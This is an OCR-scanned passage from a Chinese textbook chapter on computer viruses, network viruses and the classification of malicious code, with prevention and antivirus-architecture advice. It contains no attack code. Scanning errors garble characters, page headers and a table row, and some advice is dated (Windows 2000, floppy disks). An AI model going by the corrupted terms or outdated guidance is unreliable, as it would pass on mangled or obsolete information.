@ 诡秘 型 病毒 。 它 们 一 般 不 直接 修改 DOS 中 断 和 扇 区 数据 ,而 是 通过 设备 技术 和 文 
件 缓冲 区 等 DOS 内 部 修改 ,不 易 看 到 资源 ,使 用 比较 高 级 的 技术 。 利 用 DOS 空闲 的 数据 区 
进行 工作 。 

@ 宏 病 毒 。1995 年 , 随 着 Microsoft Word 功能 的 增强 ,出现 了 使 用 Word 宏 语 言 编 写 
的 宏 病 毒 ,这 类 病毒 感染 Word 文档 文件 ,彻底 改变 了 人 们 “数据 文件 不 会 感染 病毒 ”的 传统 
观念 。 虽 然 宏 病毒 可 以 在 任何 一 个 功能 丰富 的 宏 语 言 的 应 用 程序 下 创建 ,但 多 数 还 是 在 微 
软 Office 程序 下 运行 的 。 

@ 变型 病毒 (又 称 幽 灵 病 毒 ) 这 一 类 病毒 使 用 一 个 复杂 的 算法 ,使 自己 每 传播 一 份 都 
具有 不 同 的 内 容 和 长 度 。 它 们 一 般 的 做 法 是 一 段 混 有 无 关 指令 的 解码 算法 和 被 变化 过 的 病 
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震 马 
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毒 体 组 成 。 
16.1.4 计算 机 病毒 的 传播 


计算 机 病毒 的 传播 途径 有 多 种 , 它 随 着 信息 技术 的 发 展 而 逐步 进化 ,主要 可 以 分 为 如 下 
4 种 : 

(1) 通过 不 可 移动 的 计算 机 硬件 设备 进行 传播 。 这些 设备 通常 有 计算 机 的 专用 ASIC 
芯片 和 硬盘 等 。 这 种 计算 机 病毒 虽然 很 少 ,但 却 有 极 强 的 破坏 能 力 。 

(2) 通过 移动 存储 设备 传播 。 这 些 设 备 主要 包括 U 盘 、 光 盘 、 磁 带 等 。 目 前 ,U 盘 是 使 
用 最 广泛 ,移动 最 频繁 的 存储 介质 ,因此 也 成 为 校园 网 ,企业 网 中 传播 病毒 的 主要 移动 设备 。 

(3) 通过 计算 机 网 络 进行 传播 。 计 算 机 病毒 可 以 附着 在 正常 文件 中 ,通过 Internet 进 
人 一 个 又 一 个 系统 中 ,这 也 是 目前 最 主要 的 计算 机 病毒 传播 方式 。 

(4) 通过 点 对 点 通信 系统 和 无 线 信道 传播 。 虽 然 这 种 病毒 现今 还 不 多 ,但 是 已 经 出 现 
端倪 ,比如 手机 病毒 Cabir, 就 是 利用 了 手机 中 的 蓝牙 技术 进行 传播 。 但 随 着 科技 的 进步 ,这 
种 传播 方式 极 可 能 成 为 未 来 计算 机 病毒 的 主要 扩散 渠道 。 


16.1.5 计算 机 病毒 的 防范 方法 


病毒 的 繁衍 方式 ,传播 方式 不 断 地 变化 , 反 病毒 技术 也 需要 在 与 病毒 对 抗 的 同时 不 断 推 
陈 出 新 。 现 在 ,防治 感染 病毒 主要 有 两 种 手段 : 一 是 用 户 遵守 和 加 强 安全 操作 控制 措施 ,在 
思想 上 要 重视 病毒 可 能 造成 的 危害 ; 二 是 在 安全 操作 的 基础 上 ,使 用 硬件 和 软件 防 病 毒 工 
具 , 利 用 网 络 的 优势 ,把 防 病毒 纳入 到 网 络 安全 体系 之 中 。 形 成 一 套 完整 的 安全 机 制 , 使 病 
毒 无 法 逾越 计算 机 安全 保护 的 屏障 ,病毒 便 无 法 广泛 传播 。 实 践 证 明 , 通 过 这 些 防 护 措施 和 
手段 ,可 以 有 效 地 降低 计算 机 系统 被 病毒 感染 的 几率 ,保障 系统 的 安全 稳定 运行 。 

对 病毒 的 预防 在 病毒 防治 工作 中 起 到 主导 作用 。 病 毒 预防 是 一 个 主动 的 过 程 ,不 是 针 
对 某 一 种 病毒 ,而 是 针对 病毒 可 能 入 侵 的 系统 薄弱 环节 加 以 保护 和 监控 。 而 病毒 治疗 属于 
一 个 被 动 的 过 程 。 只 有 在 发 现 一 种 病毒 进行 研究 以 后 , 才 可 以 找到 相应 的 治疗 方法 ,这 也 是 
杀毒 软件 总 是 落后 于 病毒 软件 的 原因 。 所 以 ,病毒 的 防治 重点 应 放 在 预防 上 。 防 治 计算 机 
病毒 要 从 以 下 几 个 方面 着 手 。 

1. 在 思想 和 制度 方面 

1) 加 强 立 法 、 健 全 管理 制度 

法 律 是 国家 强制 实施 的 、 公 民 必须 遵循 的 行为 准则 。 对 信息 资源 要 有 相应 的 立法 。 为 
此 ,国家 专门 出 台 了 《中 华人 民 共和 国 计 算 机 信息 系统 安全 保护 条 例 》《 中 华人 民 共 和 国信 
息 网 络 国际 联网 管理 暂行 规定 ?来 约束 用 户 的 行为 ,保护 守法 的 计算 机 用 户 的 合法 权益 。 除 
国家 制定 的 法 律 .法规 外 , 凡 使 用 计算 机 的 单位 都 应 制定 相应 的 管理 制度 ,避免 蔷 意 制造 、 传 
播 病毒 的 恶性 事件 发 生 。 例 如 ,建立 安全 管理 责任 ,根据 最 小 特权 原则 ,对 系统 的 工作 人 员 
和 资源 进行 访问 权限 划分 ; 建立 人 员 许 可 证 制度 ,对 外 来 人 员 上 机 实行 登记 制度 等 。 

2) 加 强 教育 和 宣传 ,打击 盗版 

加 强 计算 机 安全 教育 ,使 计算 机 的 使 用 者 能 学 习 和 和 掌握 一 些 必 备 的 反 病毒 知识 和 防范 
措施 ,使 网 络 资源 得 到 正常 合理 的 使 用 ,防止 信息 系统 及 其 软件 的 破坏 ,防止 非法 用 户 的 入 
侵 干 扰 ,防止 有 害 信 息 的 传播 。 


现在 盗版 软件 泛滥 ,这 也 是 造成 病毒 泛滥 的 原因 之 一 。 因 此 ,加 大 执法 力度 ,打击 非法 
的 盗版 活动 ,使 用 正版 软件 是 截断 病毒 扩散 的 重要 手段 。 

2. 在 技术 措施 方面 

除 管理 方面 的 措施 外 ,防止 计算 机 病毒 的 感 当 和 蔓延 还 应 采取 有 效 的 技术 措施 。 应 采 
用 纵深 防御 的 方法 ,采用 多 种 阻塞 渠道 和 多 种 安全 机 制 对 病毒 进行 隔离 ,这 是 保护 计算 机 系 
统 免 遭 病 毒 危害 的 有 效 方法 。 内 部 控制 和 外 部 控制 相 结合 ,设置 相应 的 安全 策略 。 常 用 的 
方法 有 系统 安全 、 软 件 过 滤 ,文件 加 密 、 生 产 过 程控 制 \ 后 备 恢复 和 安装 防 病毒 软件 等 措施 。 

1) 系统 安全 

对 病毒 的 预防 依赖 于 计算 机 系统 本 身 的 安全 ,而 系统 的 安全 又 首先 依赖 于 操作 系统 的 
安全 。 开 发 并 完善 高 安全 的 操作 系统 并 向 之 迁移 ,例如 ,从 DOS 平台 移 至 安全 性 较 高 的 
UNIX 或 Windows 2000 平台 ,并 且 跟 随 版 本 和 操作 系统 补丁 的 升级 而 全 面 升 级 ,是 有 效 防 
止 病毒 的 入 侵 和 蔓延 的 一 种 根本 手段 。 

2) 软件 过 滤 

软件 过 滤 的 目的 是 识别 某 一 类 特殊 的 病毒 ,防止 它们 进入 系统 和 不 断 复制 。 对 于 进入 
系统 内 的 病毒 ,一 般 采 用 专家 系统 对 系统 参数 进行 分 析 , 以 识别 系统 的 不 正常 处 和 未 经 授权 
的 改变 。 也 可 采用 类 似 疫 苗 的 方法 识别 和 清除 。 

3) 软件 加 密 

软件 加 密 是 对 付 病 毒 的 有 效 的 技术 措施 ,由 于 开销 较 大 ,目前 只 用 于 特别 重要 的 系统 。 
软件 加 密 就 是 将 系统 中 可 执行 文件 加 密 。 若 施放 病毒 者 不 能 在 可 执行 文件 加 密 前 得 到 该 文 
件 ,或 不 能 破译 加 密 算法 , 则 该 文件 不 可 能 被 感染 。 即 使 病毒 在 可 执行 文件 加 密 前 传染 了 该 
文件 ,该 文件 解码 后 ,病毒 也 不 能 向 其 他 可 执行 文件 传播 ,从 而 杜绝 了 病毒 的 复制 。 

4) 备份 恢复 

定期 或 不 定期 地 进行 磁盘 文件 备份 ,确保 每 一 个 细节 的 准确 可靠, 在 万 一 系统 崩溃 时 
最 大 限度 地 恢复 系统 。 对 付 病 毒 破坏 最 有 效 的 办 法 就 是 制作 备份 。 将 程序 和 数据 分 别 备 份 
在 不 同 的 磁盘 上 , 当 系 统 遭 遇 病毒 袭击 时 ,可 通过 与 后 备 副 本 比较 或 重新 装 人 一 个 备份 的 、 
干净 的 源 程序 来 解决 。 

5) 建立 严密 的 病毒 监视 体系 

后 台 实 时 扫描 病毒 的 应 用 程序 也 可 有 效 地 防御 病毒 的 侵袭 。 它 能 对 E-mail 的 附加 部 
分 .下 载 的 Internet 文件 (包括 压缩 文件 )、 软 盘 以 及 正在 打开 的 文件 进行 实时 扫描 检测 , 确 
认 无 异常 后 再 继续 向 下 执行 ,车 有 异常 . 则 提问 并 停止 执行 。 及 时 对 反 病 毒 软件 进行 升级 ， 
能 有 效 地 防止 病毒 的 入 侵 和 扩散 。 对 于 联网 的 计算 机 最 好 使 用 网 络 版 的 反 病毒 软件 ,这 样 
便于 集中 管理 ,软件 升级 和 病毒 监控 。 

6) 在 内 部 网 络 出 口 进行 访问 控制 

网 络 病毒 一 般 都 使 用 某 些 特定 的 端口 收发 数据 包 以 进行 网 络 传播 ,在 网 络 出 口 的 防火 
墙 或 路 由 器 上 禁止 这 些 端口 访问 内 部 网 络 ,可 以 有 效 地 防止 内 部 网 络 中 计算 机 感染 网 络 
病毒 。 


计算 机 涤 素 、 和 恶意 代码 及 防范 


山 避 


司 于 烘 铀 的 网 络 作 会 技术 与 实践 


16.2 计算 机 网 络 病毒 及 防范 方法 


16.2.1 计算 机 网 络 病毒 的 特点 


网 络 病毒 实际 上 是 一 个 笼统 的 概念 .可 以 从 两 方面 理解 : 一 是 网 络 病毒 专门 指 在 网 络 
上 传播 .并 对 网 络 进行 破坏 的 病毒 ; 二 是 网 络 病毒 是 指 与 Internet 有 关 的 病毒 ,如 HTML 
病毒 .电子 邮件 病毒 Java 病毒 等 。 
随 着 计算 机 技术 及 网 络 技术 的 发 展 ,计算 机 病毒 呈现 出 一 些 新 的 特点 。 
(1) 入 侵 计 算 机 网 络 的 病毒 形式 多 样 。 既 有 单 用 户 微 型 机 上 常见 的 某 些 计 算 机 病毒 ， 
如 感染 磁盘 系统 区 的 引导 型 病毒 和 感染 可 执行 文件 的 文件 型 病毒 ,也 有 专门 攻击 计算 机 网 
络 的 网 络 型 病毒 ,如 特洛伊 木马 病毒 及 蠕虫 病毒 。 

(2) 不 需要 寄主 。 传 统 型 病毒 的 一 个 特点 就 是 一 定 有 一 个 “寄主 ?程序 ,病毒 就 隐藏 在 
这 些 程序 里 。 最 常见 的 就 是 一 些 可 执行 文件 , 像 扩 展 名 为 . exe 及. com 的 文件 ,以 及 . doc 文 
件 为 “寄主 ”的 宏 病 毒 。 现 在 ,在 网 络 上 不 需要 寄主 的 病毒 也 出 现 了 。 例 如 Java 和 ActiveX 
的 执行 方式 ,是 把 程序 码 写 在 网 页 上 。 当 与 这 个 网 站 连接 时 ,浏览 器 就 把 这 些 程序 码 读 下 
来 。 这 样 ,使 用 者 就 会 在 神 不 知 鬼 不 觉 的 状态 下 ,执行 了 一 些 来 路 不 明 的 程序 。 

(3) 电子 邮件 成 为 新 的 载体 。 随 着 因特网 技术 的 发 展 ,电子 邮件 已 经 成 为 广大 用 户 进 
行 信 息 交 流 的 重要 工具 。 但 是 ,计算 机 病毒 也 得 到 了 迅速 的 发 展 ,电子 邮件 作为 媒介 使 计算 
机 病毒 传播 得 尤为 迅速 ,引起 各 界 广泛 关注 。 

(4) 利用 操作 系统 安全 漏洞 主动 攻击 。 目 前 一 些 网 络 病毒 能 够 通过 网 络 扫描 操作 系统 

漏洞 ,一 旦 发 现 漏洞 后 自主 传播 其 病毒 ,甚至 能 在 几 个 小 时 就 传 遍 全 球 。 

网 络 的 主要 特征 是 资源 共享 。 一 旦 共享 资源 感染 了 病毒 ,网 络 各 节点 间 信 息 的 频繁 传 

输 会 将 计算 机 病毒 传染 到 所 共享 的 机 器 上 ,从 而 形成 多 种 共享 资源 的 交叉 感染 。 病 毒 的 迅 
速 传播 再生、 发 作 ,将 造成 比 单机 病毒 更 大 的 危害 ,因此 网 络 环境 下 计算 机 病毒 的 防治 就 显 
得 更 加 重要 了 。 

网 络 病毒 具有 以 下 特点 : 

。 传播 方式 复杂 。 病 毒 人 侵 网 络 主要 是 通过 电子 邮件 、 网 络 共享 、 网 页 浏览 .服务 器 共 
享 目录 等 方式 传播 ,病毒 的 传播 方式 多 且 复 杂 。 

。 传播 速度 快 。 在 网 络 环境 下 ,病毒 可 以 通过 网 络 通信 机 制 ,借助 于 网 络 线路 进行 迅 
速 传输 和 扩散 ,特别 是 通过 Internet ,一 种 新 出 现 的 病毒 可 以 迅速 传播 到 全 球 各 地 。 

。 传染 范围 广 。 网络 范围 的 站 点 多 ,借助 于 网 络 中 四 通 八 达 的 传输 线路 ,病毒 可 传播 
到 网 络 的 “各 个 角落 ”, 乃至 全 球 各 地 ,所 以 ,在 网 络 环境 下 计算 机 病毒 的 传播 范 
围 广 。 

。 清除 难度 大 。 在 网 络 环境 下 ,病毒 感染 的 站 点 数量 多 、 范 围 广 。 只 要 有 一 个 站 点 的 
病毒 未 清除 干净 , 它 就 会 在 网 络 上 再 次 被 传播 开 来 ,传染 其 他 站 点 ,甚至 是 刚刚 完成 
清除 任务 的 站 点 。 

。 破坏 危害 大 。 网 络 病毒 将 直接 影响 网 络 的 工作 , 轻 则 降低 速度 ,影响 工作 效率 , 重 则 
破坏 服务 器 系统 资源 ,造成 网 络 系统 瘫痪 ,使 众多 工作 和 毁 于 一 旦 。 


。 病毒 变种 多 。 现 在 ,计算 机 高 级 编程 语言 种 类 繁多 ,网 络 环境 的 编程 语言 也 十 分 丰 
富 , 因 此 ,利用 这 些 编程 语言 编制 的 计算 机 病毒 也 是 种 类 繁杂 。 病 毒 容易 编写 ,也 容 
易 修 改 、 升 级 ,从 而 生成 许多 新 的 变种 。 

。 病毒 功能 多 样 化 。 病 毒 的 编制 技术 随 着 网 络 技术 的 普及 和 发 展 也 在 不 断 发 展 和 变 
化 。 现 代 病 毒 又 具有 了 蠕虫 的 功能 ,可 以 利用 网 络 进行 传播 。 有 些 现代 病毒 有 后 门 
程序 的 功能 ,它们 一 旦 侵入 计算 机 系统 ,病毒 控制 者 可 以 从 入 侵 的 系统 中 窃取 信息 ， 
进行 远程 控制 。 现 代 的 计算 机 网 络 病毒 具有 功能 多 样 化 的 特点 。 

。 难于 控制 。 病 毒 一 旦 在 网 络 环境 下 传播 .蔓延 ,就 很 难 对 其 进行 控制 。 往 往 在 将 对 
其 采取 措施 时 ,就 可 能 已 经 遭 到 其 侵害 。 除 非 关 闭 网 络 服务 。 但 关闭 网 络 服务 后 ， 
又 会 给 清除 病毒 带 来 不 便 ,同时 也 影响 网 络 系统 的 正常 工作 。 


16.2.2 计算 机 网 络 病毒 的 防范 方法 


网 络 防 病毒 不 同 于 单机 防 病毒 ,单机 版 的 杀毒 软件 并 不 能 在 网 络 上 彻底 有 效 地 查 杀 病 
毒 。 计 算 机 网 络 病毒 的 防治 是 一 个 颇 为 棘手 的 问题 ,在 查 毒 和 杀毒 的 应 用 中 ,多 用 几 种 防毒 
软件 比较 好 ,因为 每 一 种 防毒 软件 都 有 它 的 特色 , 几 种 综合 起 来 使 用 可 以 优势 互补 ,产生 最 
强 的 防御 效果 ,但 是 在 一 台 计 算 机 上 最 好 只 安装 一 种 防 病毒 软件 ,以 免 软 件 间 发 生 冲 突 。 

防范 网 络 病毒 应 从 两 方面 着 手 : 第 一 ,加 强 网 络 管理 人 员 的 网 络 安全 意识 ,有 效 控制 和 
管理 内 部 网 与 外 界 进 行 数据 交换 ,同时 坚决 抵制 盗版 软件 的 使 用 ; 第 二 ,以 网 为 本 ,多 层 防 
御 , 有 选择 地 加 载 保 护 计算 机 网 络 安全 的 网 络 防 病毒 产品 。 

1. 网 络 版 防 病毒 软件 简介 

目前 常用 的 网 络 版 防 病毒 软件 有 Norton 瑞星 和 金山 毒霸 等 。 

网 络 版 防 病毒 软件 应 该 具有 病毒 查 杀 、 对 新 病毒 的 反应 ,病毒 实时 监测 ,智能 安装 、 远 程 
识别 ,集中 管理 ,智能 升级 、 远 程 报警 分布 查 杀 、 易 于 操作 、 磁 盘 数据 保护 、 实 时 监控 系统 资 
源 占 用 率 低 以 及 与 其 他 软件 兼容 等 特点 。 

网 络 版 防 病毒 软件 一 般 由 系统 中 心 .服务 器 端 、 客 户 端 和 控制 台 组 成 。 

(1) 系统 中 心 。 系 统 中 心 是 网 络 防 病毒 系统 的 信息 管理 和 病毒 防护 的 自动 控制 核心 ， 
实时 地 记录 防护 体系 内 每 台 计 算 机 上 的 病毒 监控 检测 和 清除 信息 ,同时 ,根据 控制 台 的 设 
置 , 实 现 对 整个 防护 系统 的 自动 控制 。 

(2) 服务 器 端 。 服 务 器 端 是 专门 为 应 用 在 网 络 服务 器 的 操作 系统 设计 的 防 病毒 子 系 
统 。 它 承担 着 对 当前 服务 器 上 病毒 的 实时 监控 \ 检 测 和 清除 任务 ,同时 自动 向 系统 中 心 报告 
病毒 监测 情况 。 

(3) 客户 端 。 客 户 端 是 专门 为 网 络 工 作 站 设计 的 防 病毒 子 系统 。 它 承担 着 对 当前 工作 
站 上 病毒 的 实时 监控 检测 和 清除 任务 ,同时 ,自动 向 系统 中 心 报告 病毒 监测 情况 。 

(4) 控制 台 。 控 制 台 是 整个 网 络 防 病毒 系统 设置 .使 用 和 控制 的 操作 平台 ,也 是 为 网 络 
管理 员 专 门 设计 的 操作 平台 。 它 集中 管理 网 络 上 所 有 已 安装 过 该 网 络 版 客户 端的 计算 机 ， 
保障 每 个 纳入 病毒 防护 的 计算 机 时 刻 处 于 最 佳 的 防 病毒 状态 。 

2. 网 关 型 防 病毒 系统 简介 

1995 年 ,趋势 网 关 防 病毒 技术 就 在 美国 申请 了 专利 。 但 此 后 的 几 年 ,用 户 并 没有 太 多 
关注 它 。 伴 随 着 互联 网 技术 的 发 展 ,网 关 杀 毒 市 场 也 日 趋 成 熟 ,从 桌面 杀毒 到 网 关 杀 毒 , 已 
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是 互联 网 发 展 的 必然 。 
从 概念 上 讲 ,网关 防 病毒 就 是 从 整个 网 络 的 入口 开始 ,阻止 来 自 Internet 的 病毒 人 侵 ， 
同时 还 要 防止 病毒 在 进出 企业 内 部 网 络 时 的 传播 。 
目前 ,国内 市 场 上 有 很 多 网 关 防 病毒 产品 ,如 趋势 、 赛 门 铁 克 、NAI、F-secure、 北 信 源 和 
瑞星 等 公司 的 网 关 防 病毒 产品 。 
网 关 防 病毒 技术 主要 有 两 部 分 : 一 部 分 是 如 何 对 进出 网 关 的 数据 进行 查 杀 ; 另 一 部 分 
是 对 要 查 杀 的 数据 进行 检测 与 清除 。 后 者 对 于 防 病毒 厂商 来 讲 是 很 容易 做 到 的 。 纵 观 国外 
的 网 关 防 病毒 产品 ,它们 对 数据 的 病毒 检测 还 是 以 特征 码 匹配 技术 为 主 ,其 扫描 技术 及 病毒 
库 与 其 服务 器 版 防 病毒 产品 是 一 致 的 。 而 如 何 对 进出 网 关 的 数据 进行 查 杀 , 则 是 网 关 防 病 
毒 技 术 的 关键 。 由 于 目前 国内 外 防 病毒 产品 还 无 法 对 数据 包 进 行 病毒 检测 ,因此 各 厂商 在 
网 关 处 只 能 采取 将 数据 包 还 原 成 文件 的 方式 进行 病毒 处 理 。 在 网 关 处 查 杀 病毒 方面 , 防 病 
毒 厂 商 所 采取 的 方式 又 各 不 相同 ,主要 分 为 以 下 4 种 方式 : 
。 第 一 种 为 基于 代理 服务 器 的 方式 实现 。 这 种 方式 主要 是 依靠 代理 服务 器 对 数据 进 
行 还 原 , 在 数据 通过 代理 服务 器 时 将 其 根据 不 同 协议 进行 还 原 , 青 利用 安装 在 代理 
服务 器 内 的 扫描 引擎 对 其 进行 病毒 的 查 杀 。 
。 第 二 种 为 基于 防火 墙 协议 还 原 的 方式 实现 。 这 种 方式 主要 是 利用 防火 墙 的 协议 还 
原 功 能 ,将 数据 包 还 原 为 不 同 协议 的 文件 ,然后 传送 到 相应 的 病毒 扫描 服务 器 进行 
查 杀 ,扫描 后 再 将 该 文件 传送 回 防火 墙 并 进行 数据 传输 。 病 毒 扫描 服务 器 可 以 有 多 
个 ,防火 墙 内 的 防 病毒 代理 根据 不 同 协议 ,将 相应 的 协议 数据 转送 到 不 同 的 病毒 扫 
描 服 务 器 。 
一 般 来 讲 ,不 同 厂商 在 防火 墙 与 病毒 扫描 服务 器 之 间 进 行 数据 交换 的 过 程 都 采用 各 自 
的 协议 。 在 这 里 要 重点 说 明 的 是 ,并 不 是 具有 协议 还 原 功 能 的 防火 墙 就 支持 网 关 防 病毒 产 
品 , 目 前 此 类 产品 主要 支持 CVP 协议 的 防火 墙 (如 Check point 防火 墙 等 ) ,相对 优秀 的 产品 
也 能 支持 PIX 等 其 他 防火 墙 。 
。 第 三 种 为 基于 邮件 服务 器 的 方式 实现 。 这 种 方式 也 可 认为 是 以 邮件 服务 器 为 网 关 ， 
在 邮件 服务 器 上 安装 相应 的 邮件 服务 器 版 防 病毒 产品 。 
邮件 服务 器 版 防 病毒 产品 与 以 上 两 种 方式 又 不 相同 , 它 主要 是 通过 将 防 病毒 程序 内 幅 
在 邮件 系统 内 (邮件 版 防 病毒 程序 一 般 是 以 邮件 系统 的 一 个 服务 形式 而 存在 的 ) ,在 进出 邮 
件 转发 前 对 邮件 及 其 附件 进行 扫描 并 清除 ,从 而 防止 病毒 通过 邮件 网 关 进入 企业 内 部 。 目 
前 ,邮件 版 防 病毒 产品 主要 支持 Exchange Server、Lotus Notes 和 以 SMTP 协议 的 邮件 
系统 。 
。 第 四 种 为 基于 信息 渡船 产品 的 方式 实现 。 这 种 方式 在 网 关 防 病毒 产品 中 很 少 有 人 
提 到 ,原因 是 它 本 身 不 是 一 个 防 病毒 产品 ,但 其 确实 能 够 实现 网 关 处 的 病毒 防护 。 
信息 渡船 俗称 网 闸 , 它 采 用 在 产品 内 建立 信息 孤岛 ,通过 高 速 电 子 开关 实现 数据 在 
信息 孤岛 的 交换 。 用 户 只 需 在 信息 孤岛 内 安装 防 病毒 模块 ,就 可 实现 对 数据 交换 过 
程 的 病毒 检测 与 清除 。 目 前 .国内 一 些 公司 已 有 相应 的 产品 。 
上 面 四 种 实现 方式 虽然 不 同 ,但 最 终 对 数据 进行 扫描 仍 是 通过 各 厂商 的 病毒 扫描 引 获 
实现 的 ,也 就 是 说 ,这 些 扫 描 实 现 方法 与 其 厂商 提供 的 其 他 防 病 毒 产 品 一 样 ,使 用 的 是 相同 
的 扫描 引擎 和 病毒 库 , 这 也 大 大 方便 了 网 关 防 病毒 产品 的 更 新 与 升级 。 


从 整体 讲 ,网 关 防 病毒 产品 只 是 防 病毒 产品 家 族 内 的 一 员 , 它 只 能 检测 进出 网 络 内 部 的 
数据 。 目 前 ,网 关 防 病毒 产品 还 大 多 只 能 针对 HTTP、FTP 和 SMTP 3 种 协议 的 数据 进行 
病毒 扫描 ,网 关 防 病毒 产品 还 无 法 解决 整个 网 络 的 防 病毒 问题 。 

3. 防范 计算 机 网 络 病毒 的 措施 

只 有 建立 一 个 有 层次 的 立体 的 防 病毒 体系 ,才能 有 效 制止 病毒 在 网 络 内 部 的 蔓延 。 

(1) 在 计算 机 网 络 中 ,尽量 多 用 无 盘 工 作 站 ,不 用 或 少 用 有 软驱 的 工作 站 。 这 样 只 能 执 
行 服 务 器 允许 执行 的 文件 ,而 不 能 装 和 人 或 下 载 文 件 ,避免 了 病毒 人 侵 系 统 的 机 会 ,保证 了 安 
全 。 工 作 站 是 网 络 的 门户 ,把 好 这 一 关 , 可 以 有 效 地 防止 病毒 人 侵 。 

(2) 在 计算 机 网 络 中 ,要 保证 系统 管理 员 有 最 高 的 访问 权限 ,避免 过 多 地 出 现 超 级 用 
户 。 超 级 用 户 登 录 后 将 拥有 服务 器 目录 下 的 全 部 访问 权限 ,一旦 带 入 病毒 ,将 产生 更 为 严重 
的 后 果 。 少 用 “超级 用 户 ” 身 份 登录 ,建立 用 户 组 或 功能 化 的 用 户 ,适当 将 其 部 分 权限 下 放 。 
这 样 赋予 组 管理 员 某 些 权限 与 职责 , 既 能 简化 网 络 管理 ,又 能 保证 网 络 系统 的 安全 。 

(3) 为 工作 站 上 用 户 账号 设置 复杂 的 密码 。 目 前 ,一 些 网 络 病毒 自 带 破解 密码 的 字典 ， 
对 于 密码 设置 过 于 简单 的 计算 机 可 以 很 容易 地 侵入 ,比如 “ 墨 菲 " 病 毒 ,必须 设置 复杂 的 密 
码 , 才 能 有 效 地 防止 病毒 人 侵 。 

(4) 对 非 共享 软件 ,将 其 执行 文件 和 覆盖 文件 (如 * . com、* .exe\*x.ovl 等 ) 定 期 备份 ， 
当 计算 机 出 现 异 常 时 ,将 文件 恢复 到 本 地 硬盘 上 进行 重 写 操作 。 

(5) 接收 远程 文件 输入 时 ,一 定 要 慎重 ,最 好 不 要 将 文件 直接 写 和 人 本 地 硬盘 ,而 应 将 远 
程 输入 文件 写 到 软盘 上 ,然后 对 其 进行 查 毒 ,确认 无 毒 后 再 复制 到 本 地 硬盘 上 。 

(6) 工作 站 采用 防 病毒 芯片 ,这样 可 防止 引导 型 病毒 。 

(7) 正确 设置 文件 属性 ,合理 规范 用 户 的 访问 权限 。 

(8) 建立 健全 的 网 络 系统 安全 管理 制度 ,严格 操作 规程 和 规章 制度 ,定期 作文 件 备份 和 
病毒 检测 。 即 使 有 了 杀毒 软件 ,也 不 可 掉以轻心 ,因为 没有 一 个 杀毒 软件 可 以 完全 杀 掉 所 有 
病毒 ,所 以 仍 要 记 住 定期 备份 ,一 旦 真 的 遭 到 病毒 的 破坏 ,只 要 将 受 损 的 数据 恢复 即 可 。 

(9) 目前 预防 病毒 最 好 的 办 法 就 是 在 计算 机 中 安装 具有 实时 监控 功能 的 防 病 毒 软件 ， 
并 及 时 升级 。 

(10) 为 解决 网 络 防 病毒 的 要 求 ,在 网 络 中 使 用 网 络 版 防 病毒 软件 和 网 关 型 防 病毒 


16.3 网络 恶意 代码 及 防范 方法 


16.3.1 网 络 恶意 代码 的 概念 


早期 恶意 代码 的 主要 形式 是 计算 机 病毒 。1988 年 ,Morris 蠕虫 爆发 后 ,Spafford 为 了 
区 分 蠕虫 和 病毒 ,对 病毒 重新 进行 了 定义 ,他 认为 ,计算 机 病毒 是 一 段 代码 ,能 把 自身 加 到 
其 他 程序 包括 操作 系统 上 ; 它 不 能 独立 运行 ,需要 由 它 的 宿主 程序 运行 来 激活 它 ” 而 网 络 
蠕虫 强调 自身 的 主动 性 和 独立 性 。Kienzle 和 Elder 从 破坏 性 、 网 络 传播 .主动 攻击 和 独立 性 
4 个 方面 对 网 络 蠕虫 进行 了 定义 : 网 络 蠕虫 是 通过 网 络 传播 ,无 须 用 户 干预 能 够 独立 地 或 
者 依赖 文件 共享 主动 攻击 的 恶意 代码 。 根 据 传播 策略 ,网 络 蠕虫 分 为 3 类 : E-mail 蠕虫 . 文 
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件 共享 蠕虫 和 传统 蠕虫 。 郑 辉 认 为 蠕虫 具有 主动 攻击 ,行踪 隐蔽 、 利 用 漏洞 造成 网 络 拥塞 、 
降低 系统 性 能 、 产 生 安全 隐患 ,反复 性 和 破坏 性 等 特征 ,并 给 出 相应 的 定义 :“ 网 络 蠕虫 是 无 
须 计 算 机 使 用 者 干预 即 可 运行 的 独立 程序 , 它 通过 不 停 地 获得 网 络 中 存在 漏洞 的 计算 机 上 
的 部 分 或 全 部 控制 权 来 进行 传播 ”。 

20 世纪 90 年 代 末 ,恶意 代码 的 定义 随 着 计算 机 网 络 技术 的 发 展 逐 渐 丰 富 ,Crimes 将 恶 
意 代 码 定义 为 : 经 过 存储 介质 和 网 络 进行 传播 ,从 一 台 计 算 机 系统 到 另外 一 台 计 算 机 系统 ， 
未 经 授权 认证 破坏 计算 机 系统 完整 性 的 程序 或 代码 。 


16.3.2 网 络 恶 意 代 码 的 分 类 


根据 恶意 代码 定义 ,常见 的 恶意 代码 可 以 分 为 普通 病毒 .蠕虫 、 木 马 、 移 动 代码 和 复合 型 
病毒 五 类 。 恶 意 代 码 的 分 类 方法 与 实例 如 表 16. 1 和 表 16. 2 所 示 。 


表 16.1 恶意 代码 的 分 类 方法 


分 类 标准 需要 宿主 无 需 宿主 
不 能 自我 复制 不 感染 的 依附 性 恶意 代码 不 感染 的 独立 性 恶意 代码 
能 够 自我 复制 可 感染 的 依附 性 恶意 代码 可 感染 的 独立 性 恶意 代码 


表 16.2 恶意 代码 的 分 类 实例 


类 别 实 例 
特洛伊 木马 (Trojan horse) 逻 辑 炸弹 (Logic bomb) 


作证 人 本 王八 全 后 门 (Backdoor) 或 陷 门 (Trapdoor) 

不 感染 的 独立 性 恶意 代码 点 滴 器 (Dropper) ,繁殖 器 (Generator) 恶 作 剧 (Hoax) 
可 感染 的 依附 性 恶意 代码 病毒 (Virus) 

可 感染 的 独立 性 恶意 代码 蠕虫 (Worm) 细 菌 (Germ) 


严格 地 从 概念 上 讲 ,计算机 病毒 是 恶意 代码 的 一 种 , 即 可 感染 的 依附 性 恶意 代码 ,这 是 
纯粹 意义 上 的 计算 机 病毒 概念 。 实 际 上 ,目前 发 现 的 恶意 代码 几乎 都 是 混合 型 的 计算 机 病 
毒 , 即 除了 具有 纯粹 意义 上 的 病毒 特征 外 ,还 带 有 其 他 类 型 恶意 代码 的 特征 。 

蠕虫 病毒 就 是 最 典型 和 最 常见 的 恶意 代码 , 它 是 蠕虫 和 病毒 的 混合 体 。 加 之 “病毒 ”一 
词 非常 形象 且 很 具 感 染 力 ,因此 ,媒体 .杂志 ,包括 很 多 专业 文章 和 书籍 都 喜欢 用 “计算 机 病 
毒 ” 来 指 学 术 上 的 恶意 代码 。 在 这 个 意义 上 讲 ,“ 计 算 机 病毒 ”一 词 就 不 仅 限于 纯粹 的 计算 机 
病毒 ,而 是 指 混合 型 的 计算 机 病毒 。 

1. 普通 病毒 

